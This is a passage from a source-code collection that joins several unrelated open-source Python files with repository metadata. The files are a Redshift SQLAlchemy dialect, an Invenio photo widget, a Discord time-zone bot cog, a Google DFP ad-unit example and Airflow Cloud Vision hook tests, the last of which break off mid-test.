{'query': compiler.process(element.select, unload_select=True, literal_binds=True),
'unload_location': element.unload_location,
'access_key': element.access_key,
'secret_key': element.secret_key,
'session_token': ';token=%s' % element.session_token if element.session_token else '',
'add_quotes': 'ADDQUOTES' if bool(element.options.get('add_quotes', True)) else '',
'null_as': ("NULL '%s'" % element.options.get('null_as')) if element.options.get('null_as') else '',
'delimiter': element.options.get('delimiter', ','),
'parallel': element.options.get('parallel', 'ON')}
# At the time of this implementation, no specification for a session token was
# found. After looking at a few session tokens they appear to be the same as
# the aws_secret_access_key pattern, but much longer. An example token can be
# found here: http://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html
# The regexs for access keys can be found here: http://blogs.aws.amazon.com/security/blog/tag/key+rotation
creds_rx = re.compile(r"""
^aws_access_key_id=[A-Z0-9]{20};
aws_secret_access_key=[A-Za-z0-9/+=]{40}
(?:;token=[A-Za-z0-9/+=]+)?$
""", re.VERBOSE)
class CopyCommand(Executable, ClauseElement):
"""
Prepares a Redshift COPY statement.
Parameters
----------
table : sqlalchemy.Table
The table to copy data into
data_location : str
The Amazon S3 location from where to copy, or a manifest file if
the `manifest` option is used
access_key : str
secret_key : str
session_token : str, optional
delimiter : File delimiter, optional
defaults to ','
ignore_header : int, optional
Integer value of number of lines to skip at the start of each file
dangerous_null_delimiter : str, optional
Optional string value denoting what to interpret as a NULL value from
the file. Note that this parameter *is not properly quoted* due to a
difference between redshift's and postgres's COPY commands
interpretation of strings. For example, null bytes must be passed to
redshift's ``NULL`` verbatim as ``'\\0'`` whereas postgres's ``NULL``
accepts ``'\\x00'``.
manifest : bool, optional
Boolean value denoting whether data_location is a manifest file.
empty_as_null : bool, optional
Boolean value denoting whether to load VARCHAR fields with empty
values as NULL instead of empty string
blanks_as_null : bool, optional
Boolean value denoting whether to load VARCHAR fields with whitespace
only values as NULL instead of whitespace
format : str, optional
CSV, JSON, or AVRO. Indicates the type of file to copy from.
compression : str, optional
GZIP, LZOP, indicates the type of compression of the file to copy
"""
formats = ['CSV', 'JSON', 'AVRO']
compression_types = ['GZIP', 'LZOP']
def __init__(self, table, data_location, access_key_id, secret_access_key,
session_token=None, delimiter=',', ignore_header=0,
dangerous_null_delimiter=None, manifest=False,
empty_as_null=True,
blanks_as_null=True, format='CSV', compression=None):
credentials = 'aws_access_key_id={0};aws_secret_access_key={1}'.format(
access_key_id,
secret_access_key
)
if session_token is not None:
credentials += ';token={0}'.format(session_token)
if not creds_rx.match(credentials):
raise ValueError('credentials must match the following'
' format:\n'
'aws_access_key_id=<access-key-id>;'
'aws_secret_access_key=<secret-access-key>'
'[;token=<temporary-session-token>]\ngot %r' %
credentials)
if len(delimiter) != 1:
raise ValueError('"delimiter" parameter must be a single '
'character')
if not isinstance(ignore_header, numbers.Integral):
raise TypeError('"ignore_header" parameter should be an integer')
if format not in self.formats:
raise ValueError('"format" parameter must be one of %s' %
self.formats)
if compression is not None and compression not in self.compression_types:
raise ValueError('"compression" parameter must be one of %s' %
self.compression_types)
self.table = table
self.data_location = data_location
self.credentials = credentials
self.delimiter = delimiter
self.ignore_header = ignore_header
self.dangerous_null_delimiter = dangerous_null_delimiter
self.manifest = manifest
self.empty_as_null = empty_as_null
self.blanks_as_null = blanks_as_null
self.format = format
self.compression = compression or ''
def _tablename(t, compiler):
name = compiler.preparer.quote(t.name)
if t.schema is not None:
return '%s.%s' % (compiler.preparer.quote_schema(t.schema), name)
else:
return name
@compiles(CopyCommand)
def visit_copy_command(element, compiler, **kw):
''' Returns the actual sql query for the CopyCommand class
'''
qs = """COPY {table} FROM :data_location
CREDENTIALS :credentials
{format}
TRUNCATECOLUMNS
DELIMITER :delimiter
IGNOREHEADER :ignore_header
{null}
{manifest}
{compression}
{empty_as_null}
{blanks_as_null}
""".format(table=_tablename(element.table, compiler),
format=element.format,
manifest='MANIFEST' if element.manifest else '',
compression=element.compression,
empty_as_null='EMPTYASNULL' if element.empty_as_null else '',
blanks_as_null='BLANKSASNULL' if element.blanks_as_null else '',
ignore_header=element.ignore_header,
null=(("NULL '%s'" % element.dangerous_null_delimiter)
if element.dangerous_null_delimiter is not None else ''))
return compiler.process(
sa.text(qs).bindparams(
sa.bindparam('data_location',
value=element.data_location,
type_=sa.String),
sa.bindparam('credentials', value=element.credentials,
type_=sa.String),
sa.bindparam('delimiter',
value=element.delimiter,
type_=sa.String),
sa.bindparam('ignore_header',
value=element.ignore_header,
type_=sa.Integer)
),
**kw
)
@compiles(BindParameter)
def visit_bindparam(bindparam, compiler, **kw):
res = compiler.visit_bindparam(bindparam, **kw)
if 'unload_select' in kw:
# process param and return
res = res.replace("'", "\\'")
res = res.replace('%', '%%')
return res
else:
return res
|
bouk/redshift_sqlalchemy
|
redshift_sqlalchemy/dialect.py
|
Python
|
mit
| 34,694 | 0.000461 |
# -*- coding: utf-8 -*-
##
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebJournal widget - display photos from given collections
"""
from invenio.bibformat_engine import BibFormatObject
from invenio.search_engine import perform_request_search
from invenio.config import CFG_CERN_SITE, CFG_SITE_URL
def format(bfo, collections, max_photos="3", separator="<br/>"):
"""
Display the latest pictures from the given collection(s)
@param collections: comma-separated list of collection form which photos have to be fetched
@param max_photos: maximum number of photos to display
@param separator: separator between photos
"""
try:
int_max_photos = int(max_photos)
except:
int_max_photos = 0
try:
collections_list = [coll.strip() for coll in collections.split(',')]
except:
collections_list = []
out = get_widget_html(bfo.lang, int_max_photos,
collections_list, separator, bfo.lang)
return out
def escape_values(bfo):
"""
Called by BibFormat in order to check if output of this element
should be escaped.
"""
return 0
def get_widget_html(language, max_photos, collections, separator, ln):
"""
Returns the content of the widget
"""
latest_photo_ids = perform_request_search(c=collections,
rg=max_photos,
of='id')
images_urls = []
for recid in latest_photo_ids[:max_photos]:
try:
photo_record = BibFormatObject(recid)
except:
# todo: Exception, no photo in this selection
continue
if language == "fr":
try:
title = photo_record.fields('246_1a', escape=1)[0]
except KeyError:
title = ""
else:
try:
title = photo_record.fields('245__a', escape=1)[0]
except KeyError:
# todo: exception, picture with no title
title = ""
if CFG_CERN_SITE and photo_record.fields('8567_'):
# Get from 8567_
dfs_images = photo_record.fields('8567_')
for image_block in dfs_images:
if image_block.get("y", '') == "Icon":
if image_block.get("u", '').startswith("http://"):
images_urls.append((recid, image_block["u"], title))
break # Just one image per record
else:
# Get from 8564_
images = photo_record.fields('8564_')
for image_block in images:
if image_block.get("x", '').lower() == "icon":
if image_block.get("q", '').startswith("http://"):
images_urls.append((recid, image_block["q"], title))
break # Just one image per record
# Build output
html_out = separator.join(['<a href="%s/record/%i?ln=%s"><img class="phr" width="100" height="67" src="%s"/>%s</a>' % (CFG_SITE_URL, recid, ln, photo_url, title) for (recid, photo_url, title) in images_urls])
return html_out
|
ppiotr/Bibedit-some-refactoring
|
modules/webjournal/lib/widgets/bfe_webjournal_widget_latestPhoto.py
|
Python
|
gpl-2.0
| 3,928 | 0.005855 |
import asyncio
import discord
import datetime
import pytz
from discord.ext import commands
from Cogs import FuzzySearch
from Cogs import Settings
from Cogs import DisplayName
from Cogs import Message
from Cogs import Nullify
class Time:
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot, settings):
self.bot = bot
self.settings = settings
@commands.command(pass_context=True)
async def settz(self, ctx, *, tz : str = None):
"""Sets your TimeZone - Overrides your UTC offset - and accounts for DST."""
usage = 'Usage: `{}settz [Region/City]`\nYou can get a list of available TimeZones with `{}listtz`'.format(ctx.prefix, ctx.prefix)
if not tz:
self.settings.setGlobalUserStat(ctx.author, "TimeZone", None)
await ctx.channel.send("*{}*, your TimeZone has been removed!".format(DisplayName.name(ctx.author)))
return
# Let's get the timezone list
tz_list = FuzzySearch.search(tz, pytz.all_timezones, None, 3)
if not tz_list[0]['Ratio'] == 1:
# We didn't find a complete match
msg = "I couldn't find that TimeZone!\n\nMaybe you meant one of the following?\n```"
for tz in tz_list:
msg += tz['Item'] + "\n"
msg += '```'
await ctx.channel.send(msg)
return
# We got a time zone
self.settings.setGlobalUserStat(ctx.author, "TimeZone", tz_list[0]['Item'])
await ctx.channel.send("TimeZone set to *{}!*".format(tz_list[0]['Item']))
@commands.command(pass_context=True)
async def listtz(self, ctx, *, tz_search = None):
"""List all the supported TimeZones in PM."""
if not tz_search:
msg = "__Available TimeZones:__\n\n"
for tz in pytz.all_timezones:
msg += tz + "\n"
else:
tz_list = FuzzySearch.search(tz_search, pytz.all_timezones)
msg = "__Top 3 TimeZone Matches:__\n\n"
for tz in tz_list:
msg += tz['Item'] + "\n"
await Message.say(self.bot, msg, ctx.channel, ctx.author, 1)
@commands.command(pass_context=True)
async def tz(self, ctx, *, member = None):
"""See a member's TimeZone."""
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
if member == None:
member = ctx.message.author
if type(member) == str:
# Try to get a user first
memberName = member
member = DisplayName.memberForName(memberName, ctx.message.guild)
if not member:
msg = 'Couldn\'t find user *{}*.'.format(memberName)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await ctx.channel.send(msg)
return
# We got one
timezone = self.settings.getGlobalUserStat(member, "TimeZone")
if timezone == None:
msg = '*{}* hasn\'t set their TimeZone yet - they can do so with the `{}settz [Region/City]` command.'.format(DisplayName.name(member), ctx.prefix)
await ctx.channel.send(msg)
return
msg = '*{}\'s* TimeZone is *{}*'.format(DisplayName.name(member), timezone)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def setoffset(self, ctx, *, offset : str = None):
"""Set your UTC offset."""
if offset == None:
self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", None)
msg = '*{}*, your UTC offset has been removed!'.format(DisplayName.name(ctx.message.author))
await ctx.channel.send(msg)
return
offset = offset.replace('+', '')
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
await ctx.channel.send('Offset has to be in +-H:M!')
return
off = "{}:{}".format(hours, minutes)
self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", off)
msg = '*{}*, your UTC offset has been set to *{}!*'.format(DisplayName.name(ctx.message.author), off)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def offset(self, ctx, *, member = None):
"""See a member's UTC offset."""
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
if member == None:
member = ctx.message.author
if type(member) == str:
# Try to get a user first
memberName = member
member = DisplayName.memberForName(memberName, ctx.message.guild)
if not member:
msg = 'Couldn\'t find user *{}*.'.format(memberName)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await ctx.channel.send(msg)
return
# We got one
offset = self.settings.getGlobalUserStat(member, "UTCOffset")
if offset == None:
msg = '*{}* hasn\'t set their offset yet - they can do so with the `{}setoffset [+-offset]` command.'.format(DisplayName.name(member), ctx.prefix)
await ctx.channel.send(msg)
return
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
await ctx.channel.send('Offset has to be in +-H:M!')
return
msg = 'UTC'
# Apply offset
if hours > 0:
# Apply positive offset
msg += '+{}'.format(offset)
elif hours < 0:
# Apply negative offset
msg += '{}'.format(offset)
msg = '*{}\'s* offset is *{}*'.format(DisplayName.name(member), msg)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def time(self, ctx, *, offset : str = None):
"""Get UTC time +- an offset."""
timezone = None
if offset == None:
member = ctx.message.author
else:
# Try to get a user first
member = DisplayName.memberForName(offset, ctx.message.guild)
if member:
# We got one
# Check for timezone first
offset = self.settings.getGlobalUserStat(member, "TimeZone")
if offset == None:
offset = self.settings.getGlobalUserStat(member, "UTCOffset")
if offset == None:
msg = '*{}* hasn\'t set their TimeZone or offset yet - they can do so with the `{}setoffset [+-offset]` or `{}settz [Region/City]` command.\nThe current UTC time is *{}*.'.format(DisplayName.name(member), ctx.prefix, ctx.prefix, datetime.datetime.utcnow().strftime("%I:%M %p"))
await ctx.channel.send(msg)
return
# At this point - we need to determine if we have an offset - or possibly a timezone passed
t = self.getTimeFromTZ(offset)
if t == None:
# We did not get an offset
t = self.getTimeFromOffset(offset)
if t == None:
await ctx.channel.send("I couldn't find that TimeZone or offset!")
return
if member:
msg = '{}; where *{}* is, it\'s currently *{}*'.format(t["zone"], DisplayName.name(member), t["time"])
else:
msg = '{} is currently *{}*'.format(t["zone"], t["time"])
# Say message
await ctx.channel.send(msg)
def getTimeFromOffset(self, offset):
offset = offset.replace('+', '')
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
return None
# await ctx.channel.send('Offset has to be in +-H:M!')
# return
msg = 'UTC'
# Get the time
t = datetime.datetime.utcnow()
# Apply offset
if hours > 0:
# Apply positive offset
msg += '+{}'.format(offset)
td = datetime.timedelta(hours=hours, minutes=minutes)
newTime = t + td
elif hours < 0:
# Apply negative offset
msg += '{}'.format(offset)
td = datetime.timedelta(hours=(-1*hours), minutes=(-1*minutes))
newTime = t - td
else:
# No offset
newTime = t
return { "zone" : msg, "time" : newTime.strftime("%I:%M %p") }
def getTimeFromTZ(self, tz):
# Assume sanitized zones - as they're pulled from pytz
# Let's get the timezone list
tz_list = FuzzySearch.search(tz, pytz.all_timezones, None, 3)
if not tz_list[0]['Ratio'] == 1:
# We didn't find a complete match
return None
zone = pytz.timezone(tz_list[0]['Item'])
zone_now = datetime.datetime.now(zone)
return { "zone" : tz_list[0]['Item'], "time" : zone_now.strftime("%I:%M %p") }
|
TheMasterGhost/CorpBot
|
Cogs/Time.py
|
Python
|
mit
| 8,457 | 0.03299 |
#!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code gets the ad unit hierarchy and displays it as a tree.
To create ad units, run create_ad_units.py
Tags: InventoryService.getAdUnit
Tags: NetworkService.getCurrentNetwork
"""
__author__ = 'api.shamjeff@gmail.com (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
from adspygoogle.dfp import DfpUtils
def main(client):
# Initialize appropriate service.
inventory_service = client.GetService('InventoryService', version='v201302')
# Get ad units by statement.
all_ad_units = DfpUtils.GetAllEntitiesByStatementWithService(
inventory_service)
# Find the root ad unit. root_ad_unit can also be set to child unit to only
# build and display a portion of the tree.
# i.e. root_ad_unit = inventory_service.GetAdUnit('INSERT_AD_UNIT_HERE')[0]
response = DfpUtils.GetAllEntitiesByStatementWithService(
inventory_service, query='WHERE parentId IS NULL')
root_ad_unit = {}
if response:
root_ad_unit = response[0]
if root_ad_unit:
BuildAndDisplayAdUnitTree(response[0], all_ad_units)
else:
print 'Could not build tree. No root ad unit found.'
def DisplayAdUnitTree(root_ad_unit, ad_unit_tree, depth=0):
"""Helper for displaying ad unit tree.
Args:
root_ad_unit: dict the root ad unit.
ad_unit_tree: dict the tree of ad units.
[optional]
depth: int the depth the tree has reached.
"""
print '%s%s (%s)' % (GenerateTab(depth), root_ad_unit['name'],
root_ad_unit['id'])
if root_ad_unit['id'] in ad_unit_tree:
for child in ad_unit_tree[root_ad_unit['id']]:
DisplayAdUnitTree(child, ad_unit_tree, depth+1)
def GenerateTab(depth):
"""Generate tabs to represent branching to children.
Args:
depth: int the depth the tree has reached.
Returns:
string inserted in front of the root unit.
"""
tab_list = []
if depth > 0:
tab_list.append(' ')
tab_list.append('| ' * depth)
tab_list.append('+--')
return ''.join(tab_list)
def BuildAndDisplayAdUnitTree(root_ad_unit, all_ad_units):
"""Create an ad unit tree and display it.
Args:
root_ad_unit: dict the root ad unit to build the tree under.
all_ad_units: list the list of all ad units to build the tree with.
"""
tree = {}
for ad_unit in all_ad_units:
if 'parentId' in ad_unit:
if ad_unit['parentId'] not in tree:
tree[ad_unit['parentId']] = []
tree[ad_unit['parentId']].append(ad_unit)
DisplayAdUnitTree(root_ad_unit, tree)
if __name__ == '__main__':
# Initialize client object.
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
main(dfp_client)
|
donspaulding/adspygoogle
|
examples/adspygoogle/dfp/v201302/inventory_service/get_ad_unit_hierarchy.py
|
Python
|
apache-2.0
| 3,490 | 0.010029 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
import pytest
from google.cloud.vision import enums
from google.cloud.vision_v1 import ProductSearchClient
from google.cloud.vision_v1.proto.image_annotator_pb2 import (
AnnotateImageResponse,
EntityAnnotation,
SafeSearchAnnotation,
)
from google.cloud.vision_v1.proto.product_search_service_pb2 import Product, ProductSet, ReferenceImage
from google.protobuf.json_format import MessageToDict
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.vision import ERR_DIFF_NAMES, ERR_UNABLE_TO_CREATE, CloudVisionHook
from tests.providers.google.cloud.utils.base_gcp_mock import mock_base_gcp_hook_default_project_id
PROJECT_ID_TEST = 'project-id'
PROJECT_ID_TEST_2 = 'project-id-2'
LOC_ID_TEST = 'loc-id'
LOC_ID_TEST_2 = 'loc-id-2'
PRODUCTSET_ID_TEST = 'ps-id'
PRODUCTSET_ID_TEST_2 = 'ps-id-2'
PRODUCTSET_NAME_TEST = f'projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/productSets/{PRODUCTSET_ID_TEST}'
PRODUCT_ID_TEST = 'p-id'
PRODUCT_ID_TEST_2 = 'p-id-2'
PRODUCT_NAME_TEST = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
PRODUCT_NAME = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
REFERENCE_IMAGE_ID_TEST = 'ri-id'
REFERENCE_IMAGE_GEN_ID_TEST = 'ri-id'
ANNOTATE_IMAGE_REQUEST = {
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
}
BATCH_ANNOTATE_IMAGE_REQUEST = [
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
},
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
},
]
REFERENCE_IMAGE_NAME_TEST = (
f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/"
f"{PRODUCTSET_ID_TEST}/referenceImages/{REFERENCE_IMAGE_ID_TEST}"
)
REFERENCE_IMAGE_TEST = ReferenceImage(name=REFERENCE_IMAGE_GEN_ID_TEST)
REFERENCE_IMAGE_WITHOUT_ID_NAME = ReferenceImage()
DETECT_TEST_IMAGE = {"source": {"image_uri": "https://foo.com/image.jpg"}}
DETECT_TEST_ADDITIONAL_PROPERTIES = {"test-property-1": "test-value-1", "test-property-2": "test-value-2"}
class TestGcpVisionHook(unittest.TestCase):
def setUp(self):
with mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.__init__',
new=mock_base_gcp_hook_default_project_id,
):
self.hook = CloudVisionHook(gcp_conn_id='test')
@mock.patch(
"airflow.providers.google.cloud.hooks.vision.CloudVisionHook.client_info",
new_callable=mock.PropertyMock,
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook._get_credentials")
@mock.patch("airflow.providers.google.cloud.hooks.vision.ProductSearchClient")
def test_product_search_client_creation(self, mock_client, mock_get_creds, mock_client_info):
result = self.hook.get_conn()
mock_client.assert_called_once_with(
credentials=mock_get_creds.return_value, client_info=mock_client_info.return_value
)
assert mock_client.return_value == result
assert self.hook._client == result
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_explicit_id(self, get_conn):
# Given
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = None
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# ProductSet ID was provided explicitly in the method call above, should be returned from the method
assert result == PRODUCTSET_ID_TEST
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=PRODUCTSET_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id(self, get_conn):
# Given
autogenerated_id = 'autogen-id'
response_product_set = ProductSet(
name=ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
)
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST
)
# Then
# ProductSet ID was not provided in the method call above. Should be extracted from the API response
# and returned.
assert result == autogenerated_id
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id_wrong_api_response(self, get_conn):
# Given
response_product_set = None
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=None,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# API response was wrong (None) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get name from response...' in str(err)
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_get_productset(self, get_conn):
# Given
name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
response_product_set = ProductSet(name=name)
get_product_set_method = get_conn.return_value.get_product_set
get_product_set_method.return_value = response_product_set
# When
response = self.hook.get_product_set(
location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response
assert response == MessageToDict(response_product_set)
get_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_no_explicit_name(self, get_conn):
# Given
product_set = ProductSet()
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = product_set
productset_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
)
# When
result = self.hook.update_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product_set)
update_product_set_method.assert_called_once_with(
product_set=ProductSet(name=productset_name),
metadata=None,
retry=None,
timeout=None,
update_mask=None,
)
@parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_no_explicit_name_and_missing_params_for_constructed_name(
self, location, product_set_id, get_conn
):
# Given
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = None
product_set = ProductSet()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.update_product_set(
location=location,
product_set_id=product_set_id,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert ERR_UNABLE_TO_CREATE.format(label='ProductSet', id_label='productset_id') in str(err)
update_product_set_method.assert_not_called()
@parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_explicit_name_missing_params_for_constructed_name(
self, location, product_set_id, get_conn
):
# Given
explicit_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
)
product_set = ProductSet(name=explicit_ps_name)
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = product_set
# When
result = self.hook.update_product_set(
location=location,
product_set_id=product_set_id,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product_set)
update_product_set_method.assert_called_once_with(
product_set=ProductSet(name=explicit_ps_name),
metadata=None,
retry=None,
timeout=None,
update_mask=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_explicit_name_different_from_constructed(self, get_conn):
# Given
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = None
explicit_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
)
product_set = ProductSet(name=explicit_ps_name)
template_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
)
# When
# Location and product_set_id are passed in addition to a ProductSet with an explicit name,
# but both names differ (constructed != explicit).
# Should throw AirflowException in this case.
with pytest.raises(AirflowException) as ctx:
self.hook.update_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
# self.assertIn("The required parameter 'project_id' is missing", str(err))
assert err
assert (
ERR_DIFF_NAMES.format(
explicit_name=explicit_ps_name,
constructed_name=template_ps_name,
label="ProductSet",
id_label="productset_id",
)
in str(err)
)
update_product_set_method.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_delete_productset(self, get_conn):
# Given
delete_product_set_method = get_conn.return_value.delete_product_set
delete_product_set_method.return_value = None
name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
# When
response = self.hook.delete_product_set(
location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response is None
delete_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
**{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
)
def test_create_reference_image_explicit_id(self, get_conn):
# Given
create_reference_image_method = get_conn.return_value.create_reference_image
# When
result = self.hook.create_reference_image(
project_id=PROJECT_ID_TEST,
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
assert result == REFERENCE_IMAGE_ID_TEST
create_reference_image_method.assert_called_once_with(
parent=PRODUCT_NAME,
reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
**{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
)
def test_create_reference_image_autogenerated_id(self, get_conn):
# Given
create_reference_image_method = get_conn.return_value.create_reference_image
# When
